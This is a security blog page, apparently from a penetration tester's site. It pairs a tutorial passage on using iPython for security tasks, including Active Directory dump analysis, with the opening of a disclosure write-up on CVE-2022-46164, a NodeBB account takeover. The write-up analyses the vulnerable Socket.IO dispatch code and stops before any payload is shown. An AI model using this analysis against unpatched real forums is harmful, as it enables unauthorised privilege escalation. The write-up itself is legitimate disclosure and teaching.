<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [21]: filecontents = open('file1.txt').read()
In [22]: filecontents
Out[22]: 'Line 1\nLine 2\nLine 3\nLine 4\nLine 5\n'
</code></pre></div></div>
<p>For a binary file, we can add <code class="language-plaintext highlighter-rouge">b</code> to the mode string for binary mode. Because we are now passing a mode explicitly, we also need to include <code class="language-plaintext highlighter-rouge">r</code> for read.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [24]: binarycontents = open('binary.bin', 'rb').read()
In [25]: binarycontents
Out[25]: b'\xde\xad\x01\x01'
</code></pre></div></div>
<h2 id="writing-a-file">Writing a file</h2>
<p>Writing a text file can be done like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [27]: open('file2.txt', 'w').write('Line 1\nLine 2')
Out[27]: 13
</code></pre></div></div>
<p>A binary file can be written to like so. Note that I am setting binary mode with <code class="language-plaintext highlighter-rouge">b</code> and also specifying a byte sequence (prefacing the string with <code class="language-plaintext highlighter-rouge">b</code>) as the input to write.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [28]: open('binary2.bin', 'wb').write(b'\x00\x00\x01')
Out[28]: 3
</code></pre></div></div>
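<p>The one liner open/write style shown above is convenient at a REPL, where the file object is garbage collected (and the file closed) almost immediately. In longer lived scripts you would normally use a context manager to guarantee the file is flushed and closed; a minimal sketch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># The context manager closes the file when the block exits,
# even if an exception is raised mid-write
with open('file2.txt', 'w') as f:
    f.write('Line 1\nLine 2')
</code></pre></div></div>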
<h2 id="reading-files">Reading files++</h2>
<p>While it's important to understand the basic process of opening and reading from a file for specific use cases or in case of problems, we usually want to do some specific things with files we read.</p>
<p>What about reading each line of a file into a list, while ignoring any blank lines in the file?</p>
<p>Let's use a list comprehension to split on newline <code class="language-plaintext highlighter-rouge">\n</code> and only process a line if it has a value. We will use the same text file read earlier, with 5 lines.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [29]: filelines = [a for a in open('file1.txt').read().split('\n') if a]
In [30]: filelines[0]
Out[30]: 'Line 1'
In [31]: len(filelines)
Out[31]: 5
In [32]: filelines[-1]
Out[32]: 'Line 5'
</code></pre></div></div>
<p>There are a few things going on here to explain. We have taken the basic format of the comprehension as explained above and extended it a little by adding a condition.</p>
<p>So the basic format that we explained above is like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<variable> for <variable> in <iterable>]
</code></pre></div></div>
<p>This has now been extended to the following form:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<variable> for <variable> in <iterable> if <condition>]
</code></pre></div></div>
<p>When a condition is specified in the comprehension, only items from the iterable that satisfy the condition are processed further and included in the output.</p>
<p>We can do even more, however. Assume we want to separate each line of the input into multiple variables on the space character.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [33]: filelines_space_separated = [a.split(' ') for a in open('file1.txt').read().split('\n') if a]
In [34]: filelines_space_separated[0]
Out[34]: ['Line', '1']
</code></pre></div></div>
<p>Now our list comprehension is performing an operation on each item from the iterable (which iterates through each line of the file):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[<operation>(<variable>) for <variable> in <iterable> if <condition>]
</code></pre></div></div>
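<p>As an aside, splitting on <code class="language-plaintext highlighter-rouge">\n</code> works, but the string method <code class="language-plaintext highlighter-rouge">splitlines</code> achieves a similar result while also handling <code class="language-plaintext highlighter-rouge">\r\n</code> line endings; an equivalent form of the earlier read:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># splitlines() drops the trailing newline and handles \r\n as well;
# the comprehension still filters out any blank lines
filelines = [a for a in open('file1.txt').read().splitlines() if a]
</code></pre></div></div>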
<h2 id="reading-and-writing-json">Reading and writing JSON</h2>
<p>JSON is a great format for exchanging semi-complex data structures with other applications, and for writing them from within Python to disk. Let's look at a simple example of using it in iPython.</p>
<p>Here's some data in a Python dictionary (<code class="language-plaintext highlighter-rouge">dict</code>):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [35]: data = {'one' : 1, "two": 2}
</code></pre></div></div>
<p>Import the json library:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [36]: import json
</code></pre></div></div>
<p>Write the data to a JSON file on disk, with indenting. Then dump the data with cat to show its representation on disk.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [37]: open('data.json', 'w').write(json.dumps(data, indent=4))
Out[37]: 30
In [38]: cat data.json
{
"one": 1,
"two": 2
}
</code></pre></div></div>
<p>We can also read the data back in from JSON format on disk into a Python representation in memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [39]: read_data = json.load(open('data.json'))
In [40]: read_data
Out[40]: {'one': 1, 'two': 2}
In [41]: read_data['one']
Out[41]: 1
</code></pre></div></div>
<p>Some more detailed examples of processing complex JSON files are included later in this post.</p>
<h2 id="making-http-requests">Making HTTP requests</h2>
<p>One very common activity in security workflows is making an HTTP request. We can do this easily in Python with the <code class="language-plaintext highlighter-rouge">requests</code> module. You will need to install this on your machine first, which you can do with pip (e.g. <code class="language-plaintext highlighter-rouge">pip install requests</code>).</p>
<p>Here's importing the module, making a simple request and looking at some response details:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [42]: import requests
In [43]: response = requests.get('https://github.com/')
In [44]: response.status_code
Out[44]: 200
In [45]: response.content[:100]
Out[45]: b'\n\n\n\n\n\n<!DOCTYPE html>\n<html lang="en" data-a11y-animated-images="system">\n <head>\n <meta chars'
</code></pre></div></div>
<p>Make an HTTPS request, but ignore certificate errors.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [46]: requests.packages.urllib3.disable_warnings()
In [47]: response2 = requests.get('https://192.168.10.34:5001/', verify=False)
In [48]: response2.status_code
Out[48]: 200
</code></pre></div></div>
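<p>When you want to inspect or replay these requests, it can also be handy to push them through an intercepting proxy. A minimal sketch, assuming Burp is listening on its default address of 127.0.0.1:8080 (target.site is a placeholder):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import requests

# Route requests through a local intercepting proxy such as Burp
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',
}

# verify=False is needed because the proxy presents its own CA certificate
response3 = requests.get('https://target.site/', proxies=proxies, verify=False)
</code></pre></div></div>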
<h2 id="run-an-operating-system-command-and-get-the-output-for-processing">Run an Operating System command and get the output for processing</h2>
<p>Run the Operating System <code class="language-plaintext highlighter-rouge">cat</code> command to read <code class="language-plaintext highlighter-rouge">data.json</code>, and put the output into the <code class="language-plaintext highlighter-rouge">output</code> variable.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [51]: import subprocess
In [52]: output = subprocess.check_output(['cat', 'data.json']).decode()
In [53]: output
Out[53]: '{\n "one": 1,\n "two": 2\n}'
</code></pre></div></div>
<p>Running <code class="language-plaintext highlighter-rouge">decode</code> on the output converts it from byte format to a string.</p>
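<p>If you need shell features such as pipes, <code class="language-plaintext highlighter-rouge">subprocess.run</code> with <code class="language-plaintext highlighter-rouge">shell=True</code> is an alternative, with the usual caveat about shell injection if any part of the command string is untrusted. A quick sketch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import subprocess

# text=True returns str instead of bytes, so no decode() is needed
result = subprocess.run('cat data.json | grep one', shell=True,
                        capture_output=True, text=True)
print(result.stdout)   # the matching line(s) from data.json
</code></pre></div></div>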
<h2 id="more">More…</h2>
<p>I've got a bunch of other Python code snippets listed <a href="https://thegreycorner.com/pentesting_stuff/writeups/pythonsnippets.html">here</a> for performing other common infosec related tasks.</p>
<h1 id="exploring-data-by-example-active-directory">Exploring data by example: Active Directory</h1>
<p>I wrote a tool for dumping Active Directory data that can be found <a href="https://github.com/stephenbradshaw/ad_ldap_dumper">here</a>. Though I plan to add Bloodhound output support at some point, at the moment I mainly analyse the results from this in iPython.</p>
<p>Examining the output from this tool provides a really good example of how to use iPython to explore a complex dataset and get useful information out of it. The general approaches used here can be adapted to other datasets if they can be converted to native Python datatypes first.</p>
<p>If you want to follow along, and don't already have your own Active Directory environment to query with the tool, you can set one up using something like <a href="https://github.com/clong/detectionlab">DetectionLab</a> or <a href="https://github.com/Orange-Cyberdefense/GOAD">GOAD</a>.</p>
<p>Now, let's get to it. The output from the AD dumping tool is in JSON format, so to properly process it using iPython we need to convert it into a native Python format, which we can do using the <code class="language-plaintext highlighter-rouge">json</code> module.</p>
<p>Import the json module if you haven't done so already.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [54]: import json
</code></pre></div></div>
<p>Now import data from the output of the tool. This particular file contains a LDAP dump from one of my AD test environments.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [55]: ad_data = json.load(open('20230719062434_DCAC.TBDPW.LOCAL_AD_Dump.json'))
</code></pre></div></div>
<p>Now that we have the data in the <code class="language-plaintext highlighter-rouge">ad_data</code> variable, let's explore it to try and understand what data is represented and how we can get useful information out of it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [57]: type(ad_data)
Out[57]: dict
</code></pre></div></div>
<p>The data is a dictionary (<code class="language-plaintext highlighter-rouge">dict</code>) type. This data type is essentially like a lookup table, with values indexed under keys. Lets start by checking what the keys are.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [58]: ad_data.keys()
Out[58]: dict_keys(['schema', 'containers', 'computers', 'domains', 'forests', 'gpos', 'groups', 'ous', 'trusted_domains', 'users', 'info', 'meta'])
</code></pre></div></div>
<p>So we have 12 different keys in this dictionary. Based on the key names, we could infer that a particular category of information is included under each of these keys. Lets explore further.</p>
<p>Now let's run a dictionary comprehension to see the type of each subobject associated with each key in the dictionary, and its length. For list objects this will be the number of items in the list, and for dict objects it will be the number of keys.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [62]: {a: [type(ad_data[a]), len(ad_data[a])] for a in ad_data.keys()}
Out[62]:
{'schema': [list, 1772],
'containers': [list, 124],
'computers': [list, 7],
'domains': [list, 1],
'forests': [list, 1],
'gpos': [list, 3],
'groups': [list, 55],
'ous': [list, 3],
'trusted_domains': [list, 0],
'users': [list, 8],
'info': [dict, 11],
'meta': [dict, 7]}
</code></pre></div></div>
<p>The above output shows that, for example, the subobject at <code class="language-plaintext highlighter-rouge">ad_data['users']</code> is a list, and contains 8 items.</p>
<p>This comprehension is a little more complex than the examples used so far in this post, so it might help to break it down a little.</p>
<p>We are using the dictionary comprehension syntax here, which is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{key : value for item in iterable}
</code></pre></div></div>
<p>The comprehension is wrapped in curly braces <code class="language-plaintext highlighter-rouge">{}</code>, indicating that this will either return a <code class="language-plaintext highlighter-rouge">set</code> or a dictionary (<code class="language-plaintext highlighter-rouge">dict</code>), depending on the specific syntax <em>within</em> the comprehension. This format has both a key and a value, so it's a dictionary.</p>
<p>The iterable is <code class="language-plaintext highlighter-rouge">ad_data.keys()</code>, and the item is <code class="language-plaintext highlighter-rouge">a</code>, which means that for each iteration of the loop expressed in this comprehension, <code class="language-plaintext highlighter-rouge">a</code> will be set to a key from <code class="language-plaintext highlighter-rouge">ad_data</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">key</code> in this example is just <code class="language-plaintext highlighter-rouge">a</code>, so this creates a new dictionary with the same keys as <code class="language-plaintext highlighter-rouge">ad_data</code>.</p>
<p>The <code class="language-plaintext highlighter-rouge">value</code> is <code class="language-plaintext highlighter-rouge">[type(ad_data[a]), len(ad_data[a])]</code>. This creates another list, where the first item is the <code class="language-plaintext highlighter-rouge">type</code> of the value in <code class="language-plaintext highlighter-rouge">ad_data[a]</code>, and the second is the length of the value in <code class="language-plaintext highlighter-rouge">ad_data[a]</code>.</p>
<p>The intent of this example is to demonstrate how you can use comprehensions in iPython to explore complex data sets, to understand them and ultimately understand how to parse the data to extract useful information.</p>
<p>Given the context that this is Active Directory information, we can infer certain things about the data represented here, e.g. that users are likely contained in the <code class="language-plaintext highlighter-rouge">users</code> key, and there are 8 of them.</p>
<p>Let's look at the first object in the list of users to see what type of object it is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [66]: type(ad_data['users'][0])
Out[66]: dict
</code></pre></div></div>
<p>So it's another dictionary. Let's look at the keys:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [67]: ad_data['users'][0].keys()
Out[67]: dict_keys(['objectClass', 'cn', 'sn', 'givenName', 'distinguishedName', 'instanceType', 'whenCreated', 'whenChanged', 'displayName', 'uSNCreated', 'memberOf', 'uSNChanged', 'nTSecurityDescriptor', 'name', 'objectGUID', 'userAccountControl', 'badPwdCount', 'codePage', 'countryCode', 'badPasswordTime', 'lastLogoff', 'lastLogon', 'pwdLastSet', 'primaryGroupID', 'objectSid', 'accountExpires', 'logonCount', 'sAMAccountName', 'sAMAccountType', 'userPrincipalName', 'objectCategory', 'dSCorePropagationData', 'mS-DS-ConsistencyGuid', 'lastLogonTimestamp', 'userAccountControlFlags', 'nTSecurityDescriptor_raw', 'domain', 'domainShort'])
</code></pre></div></div>
<p>These keys are representative of the LDAP fields for this type of object. Let's look at <code class="language-plaintext highlighter-rouge">sAMAccountName</code>, which is used to identify logon names:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [68]: ad_data['users'][0]['sAMAccountName']
Out[68]: 'tester'
</code></pre></div></div>
<p>Now let's grab the value of this field for each user object in which it's defined.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [69]: [a['sAMAccountName'] for a in ad_data['users'] if 'sAMAccountName' in a]
Out[69]:
['tester',
'unpriv',
'attacker',
'MSOL_925bb72bf36b',
'krbtgt',
'vagrant',
'Guest',
'Administrator']
</code></pre></div></div>
<p>It turns out that the <code class="language-plaintext highlighter-rouge">sAMAccountName</code> field is defined for every user object in this case, so the <code class="language-plaintext highlighter-rouge">if</code> statement above is not strictly necessary here. It's good to know how to add this qualification to stop these comprehensions from failing in cases where the field is not present, however.</p>
<p>What about another field - <code class="language-plaintext highlighter-rouge">userAccountControlFlags</code>?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [74]: ad_data['users'][0]['userAccountControlFlags']
Out[74]: ['NORMAL_ACCOUNT', 'DONT_EXPIRE_PASSWORD']
</code></pre></div></div>
<p>In the context of the LDAP dumping tool, this field is actually a parsed value, containing an interpreted list of the different flag values that are set in the <code class="language-plaintext highlighter-rouge">userAccountControl</code> field in the user account.</p>
<p>What if we try to get a list of all the unique values in this field across all the users in our data set? Another way of stating this is: what are all the user account control flags that are set for users in this Active Directory environment?</p>
<p>Here's how that comprehension would look:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [77]: set([b for a in ad_data['users'] if 'userAccountControlFlags' in a for b in a['userAccountControlFlags']])
Out[77]: {'ACCOUNTDISABLE', 'DONT_EXPIRE_PASSWORD', 'NORMAL_ACCOUNT', 'PASSWD_NOTREQD'}
</code></pre></div></div>
<p>This features yet another twist on our comprehension syntax, as we are adding another nested loop into the mix.</p>
<p>We first iterate through each user object in <code class="language-plaintext highlighter-rouge">ad_data['users']</code> and assign this to <code class="language-plaintext highlighter-rouge">a</code>, then we filter for values of <code class="language-plaintext highlighter-rouge">a</code> that have the <code class="language-plaintext highlighter-rouge">userAccountControlFlags</code> field set.</p>
<p>THEN, we add a new iterator, where we assign items from each of the lists <code class="language-plaintext highlighter-rouge">a['userAccountControlFlags']</code> to variable <code class="language-plaintext highlighter-rouge">b</code>.</p>
<p>We also use the variable <code class="language-plaintext highlighter-rouge">b</code> as the first value referenced in the comprehension, <em>because thats the value we want to return</em>.</p>
<p>So this <code class="language-plaintext highlighter-rouge">b</code> is set at the end of the comprehension’s code, but referenced at the start because we want to access it.</p>
<p>Finally we wrap the whole thing in <code class="language-plaintext highlighter-rouge">set()</code> to get only the unique values from the whole comprehension.</p>
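<p>If the inverted ordering is confusing, it can help to see the same logic unrolled into ordinary nested loops. The comprehension above is roughly equivalent to:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Loop form equivalent of the nested set comprehension above
flags = set()
for a in ad_data['users']:                      # first iterator
    if 'userAccountControlFlags' in a:          # the filter condition
        for b in a['userAccountControlFlags']:  # second, nested iterator
            flags.add(b)                        # b is the value we collect
</code></pre></div></div>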
<p>Now we can look at these flag values and query for accounts that have particular flags.</p>
<p>Let's look at accounts that are disabled (i.e. have the <code class="language-plaintext highlighter-rouge">ACCOUNTDISABLE</code> flag).</p>
<p>Here we use conditions in the <code class="language-plaintext highlighter-rouge">if</code> part of the comprehension to only return users who have the <code class="language-plaintext highlighter-rouge">ACCOUNTDISABLE</code> value in the <code class="language-plaintext highlighter-rouge">userAccountControlFlags</code> list, and we return the <code class="language-plaintext highlighter-rouge">sAMAccountName</code> logon name for those accounts.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>In [82]: [a['sAMAccountName'] for a in ad_data['users'] if 'userAccountControlFlags' in a and 'ACCOUNTDISABLE' in a['userAccountControlFlags']]
Out[82]: ['krbtgt', 'Guest']
</code></pre></div></div>
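<p>Extending the same pattern, you could also count how often each flag appears across the user set with <code class="language-plaintext highlighter-rouge">collections.Counter</code>, which can quickly highlight unusual account configurations; a sketch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>from collections import Counter

# Count occurrences of each userAccountControl flag across all users
Counter(b for a in ad_data['users']
        if 'userAccountControlFlags' in a
        for b in a['userAccountControlFlags'])
</code></pre></div></div>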
<p>Hopefully this provides a good example of how to explore complex data in iPython.</p>
<h1 id="other-specific-use-cases">Other specific use cases</h1>
<p>Some other examples of how to use iPython to do security related tasks are included below.</p>
<h2 id="nmap">Nmap</h2>
<p>I wrote a blog post back in 2016 about how to use the <code class="language-plaintext highlighter-rouge">libnmap</code> module to parse Nmap scan files and extract useful information from them using list comprehensions <a href="https://thegreycorner.com/2016/04/30/list-comprehension-one-liners-to.html">here</a>.</p>
<h2 id="burp">Burp</h2>
<p><a href="https://github.com/stephenbradshaw/BurpPythonGateway">This Burp extension</a> that I wrote makes Burp internals of the running session available to Python.</p>
<p>The readme has examples of how to look at the site map, the proxy history, and get the contents of requests and responses.</p>CVE-2022-46164 Account takeover via prototype vulnerability in NodeBB2023-01-04T05:23:00+00:002023-01-04T05:23:00+00:00/2023/01/04/CVE-2022-46164-writeup<p>During a recent security assessment, I found an account takeover vulnerability in NodeBB. I reported this to the NodeBB developers on 28 November 2022, who provided a <a href="https://github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8">patch</a> within the hour. The vulnerability has CVE ID CVE-2022-46164, with a rating of <strong>9.4: Critical</strong>. The security notification is <a href="https://github.com/NodeBB/NodeBB/security/advisories/GHSA-rf3g-v8p5-p675">here</a>. Non administrative NodeBB users can run admin functions and escalate privileges. In some configurations, anonymous users can do the same. The vulnerability affects all NodeBB releases prior to version <del><a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.6.1">2.6.1</a></del> <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.8.1">2.8.1</a> (see update below). If you are running NodeBB, you should update now.</p>
<p><strong>UPDATE 05/01/2023:</strong> The <a href="https://github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8">initial patch</a> mentioned above does not provide complete protection against exploitation of this vulnerability. An <a href="https://github.com/NodeBB/NodeBB/commit/586eed1407a78a1c1ec3af9bef3866104d3ef7cd">additional patch</a> has been applied by the NodeBB devs that protects against exploitation using nested objects. This patch is included in version <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.8.1">2.8.1</a>, which you should update to. I've added an additional section at the bottom of this post which talks about the new patch and the attack variants that it protects against.</p>
<p>This post covers how I discovered the vulnerability and how to exploit it. <a href="https://github.com/NodeBB/NodeBB">NodeBB</a> is open source, so you can follow along. The vulnerability makes use of JavaScript specific features and application specific knowledge. Finding and exploiting this bug was a fun and interesting learning exercise.</p>
<h2 id="nodebb-setup">NodeBB setup</h2>
<p>As described on the <a href="https://github.com/NodeBB/NodeBB">GitHub repository</a> for the product:</p>
<blockquote>
<p>NodeBB Forum Software is powered by Node.js and supports either Redis, MongoDB, or a PostgreSQL database. It utilizes web sockets for instant interactions and real-time notifications. NodeBB takes the best of the modern web: real-time streaming discussions, mobile responsiveness, and rich RESTful read/write APIs, while staying true to the original bulletin board/forum format → categorical hierarchies, local user accounts, and asynchronous messaging.</p>
<p>NodeBB by itself contains a “common core” of basic functionality, while additional functionality and integrations are enabled through the use of third-party plugins.</p>
</blockquote>
<p>During the assessment I had a copy of NodeBB running in a VM with debugging enabled. For debugging I had the <a href="https://github.com/NodeBB/NodeBB">NodeBB</a> source code open in Visual Studio Code.</p>
<p>I installed NodeBB on an Ubuntu VM as per the instructions <a href="https://docs.nodebb.org/installing/os/ubuntu/">here</a>. You will need to adjust these steps to install an older version of the NodeBB source code. Get commit <a href="https://github.com/NodeBB/NodeBB/commit/8a15e58dff72481f83a0c020459505b6638775f1">8a15e58dff72481f83a0c020459505b6638775f1</a>, or <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.6.0">release 2.6.0</a>. The code references in this post will refer to commit <code class="language-plaintext highlighter-rouge">8a15e58dff72481f83a0c020459505b6638775f1</code>.</p>
<p>While NodeBB Docker containers exist, I chose not to use them. The debugging setup I used is much easier to run in a VM.</p>
<h2 id="my-testing-environment">My testing environment</h2>
<p>Once NodeBB is running, we will setup Node debugging in Visual Studio Code to explore application internals. I will provide basic instructions on how to do this, but if you need more details you can go <a href="https://code.visualstudio.com/docs/editor/debugging">here</a>.</p>
<p>Clone a copy of the NodeBB code from the VM to your local drive. Then open the <strong><em>folder</em></strong> containing the code in Visual Studio Code. Click the <code class="language-plaintext highlighter-rouge">Run and Debug</code> option in the left hand pane of Visual Studio Code. You should then see an option to <code class="language-plaintext highlighter-rouge">create a launch.json file</code>. Click this and select <code class="language-plaintext highlighter-rouge">Node.js</code> from the list of options. This will provide a basic template <code class="language-plaintext highlighter-rouge">launch.json</code> debugging config you can edit to meet your needs. My edited config file looked like the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{
"version": "0.2.0",
"configurations": [
{
"address": "127.0.0.1",
"localRoot": "${workspaceFolder}",
"name": "Attach to Remote",
"port": 9229,
"remoteRoot": "/home/stephen/nodebb",
"request": "attach",
"skipFiles": [
"<node_internals>/**"
],
"type": "node"
}
]
}
</code></pre></div></div>
<p>You will need to change the values for <code class="language-plaintext highlighter-rouge">address</code>, <code class="language-plaintext highlighter-rouge">port</code> and <code class="language-plaintext highlighter-rouge">remoteRoot</code> to match your setup. The values for <code class="language-plaintext highlighter-rouge">address</code> and <code class="language-plaintext highlighter-rouge">port</code> will configure the address of the Node debugging server on your VM. I used ssh port forwarding to connect <code class="language-plaintext highlighter-rouge">127.0.0.1:9229</code> on the VM to my local machine. The <code class="language-plaintext highlighter-rouge">remoteRoot</code> setting is the location of the NodeBB code on your VM. This folder should contain the same files as the folder you opened in Visual Studio Code.</p>
<p>I had problems with NodeBB not responding to logon requests while debugging. The error “must be 0 or in range 1024 to 65535” appeared in the Node console. I suspect this is due to some part of the logon process forking to a new process. I never figured out how to fix this, and ended up just working around it by having debugging disabled when logging on. So, I logged on without the debugger to get a session cookie in my browser, then relaunched NodeBB with debugging enabled once I had an active session.</p>
<p>This involved running NodeBB with these two different commands, with <code class="language-plaintext highlighter-rouge">remoteRoot</code> as the working directory:</p>
<p>No debugging</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./nodebb dev
</code></pre></div></div>
<p>Debugging</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node --inspect-brk=127.0.0.1:9229 ./app.js
</code></pre></div></div>
<p>This debugging mode will pause execution of NodeBB at the application entry point. It requires that you connect to the debugging agent and “resume” before you can browse NodeBB.</p>
<p>It's also useful to have a running copy of the Node REPL to be able to quickly try things out, e.g.:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ node
Welcome to Node.js v16.18.1.
Type ".help" for more information.
> console.log('REPL')
REPL
undefined
>
</code></pre></div></div>
<p>I also used Firefox and Burp Suite Professional to inspect NodeBB traffic.</p>
<h2 id="the-vulnerability">The vulnerability</h2>
<p>CVE-2022-46164 resides within the Socket.IO implementation in NodeBB. This code enables socket based communication and handles a wide variety of forum functions.</p>
<p>I started examining this functionality when I noticed WebSocket traffic in Burp. An example message looked like the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>426["admin.config.setMultiple",{"title":"NodeBB1","title:short":"","title:url":"","showSiteTitle":"1","browserTitle":"","titleLayout":"","description":"","keywords":"","brand:logo":"","brand:logo:url":"","brand:logo:alt":"","og:image":"","brand:favicon":"","brand:touchIcon":"","brand:maskableIcon":"","searchDefaultIn":"titlesposts","searchDefaultInQuick":"titles","searchDefaultSortBy":"relevance","useOutgoingLinksPage":"0","outgoingLinks:whitelist":"","themeColor":"","backgroundColor":"","undoTimeout":"10000"}]
</code></pre></div></div>
<p>Not all messages were like this, but a number seemed to contain JSON content. The messages sent <strong>to</strong> the server containing JSON started with numbers beginning with <code class="language-plaintext highlighter-rouge">42</code>. The JSON content in these messages appeared to include function names and parameters.</p>
<p>On seeing this, I looked for the code handling these messages. First to see if (and how) these “function names” were resolved within the code. And second to see if I could abuse it.</p>
<p>The Socket.IO code which handles these messages is <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js">here</a>. The <code class="language-plaintext highlighter-rouge">onMessage</code> function at <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L110">line 110</a> runs when the server receives Socket.IO messages. Let’s review the code to try and understand its purpose.</p>
<p>The function definition tells us it runs with two parameters - <code class="language-plaintext highlighter-rouge">socket</code> and <code class="language-plaintext highlighter-rouge">payload</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>async function onMessage(socket, payload) {
</code></pre></div></div>
<p>These are likely the socket for communication and the data for the message. We can’t tell the data type or properties of either parameter from this. Let’s keep reading to see if this becomes clearer.</p>
<p>Beginning at <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L115">line 115</a>, we have:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const eventName = payload.data[0];
const params = typeof payload.data[1] === 'function' ? {} : payload.data[1];
const callback = typeof payload.data[payload.data.length - 1] === 'function' ? payload.data[payload.data.length - 1] : function () {};
</code></pre></div></div>
<p>This code uses the <code class="language-plaintext highlighter-rouge">payload</code> parameter to define values for <code class="language-plaintext highlighter-rouge">eventName</code>, <code class="language-plaintext highlighter-rouge">params</code> and <code class="language-plaintext highlighter-rouge">callback</code>. Beginning on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L123">line 123</a>, <code class="language-plaintext highlighter-rouge">eventName</code>, derived from <code class="language-plaintext highlighter-rouge">payload</code>, is used to define <code class="language-plaintext highlighter-rouge">methodToCall</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const parts = eventName.toString().split('.');
const namespace = parts[0];
const methodToCall = parts.reduce((prev, cur) => {
if (prev !== null && prev[cur]) {
return prev[cur];
}
return null;
}, Namespaces);
</code></pre></div></div>
<p>In the code starting on <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L159">line 159</a>, <code class="language-plaintext highlighter-rouge">methodToCall</code> is executed as a function. The specific method of calling depends on the type of function it is: either an <code class="language-plaintext highlighter-rouge">AsyncFunction</code> or a regular synchronous one. In both cases, the <code class="language-plaintext highlighter-rouge">socket</code> and <code class="language-plaintext highlighter-rouge">params</code> variables are used as parameters to the function. The <code class="language-plaintext highlighter-rouge">callback</code> variable is also called as a function, with the <code class="language-plaintext highlighter-rouge">result</code> from <code class="language-plaintext highlighter-rouge">methodToCall</code> as a parameter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (methodToCall.constructor && methodToCall.constructor.name === 'AsyncFunction') {
const result = await methodToCall(socket, params);
callback(null, result);
} else {
methodToCall(socket, params, (err, result) => {
callback(err ? { message: err.message } : null, result);
});
}
</code></pre></div></div>
<p>With user provided input defining functions to execute, remote code execution looks plausible. Let’s debug the function and see what’s happening internally.</p>
<p>Put a breakpoint at line 115 in Visual Studio Code by clicking to the left of the line number. Then we will send a crafted WebSocket message and see what happens.</p>
<p>Let’s try sending the following to see if we can set the values for <code class="language-plaintext highlighter-rouge">eventName</code>, <code class="language-plaintext highlighter-rouge">params</code> and <code class="language-plaintext highlighter-rouge">callback</code>.</p>
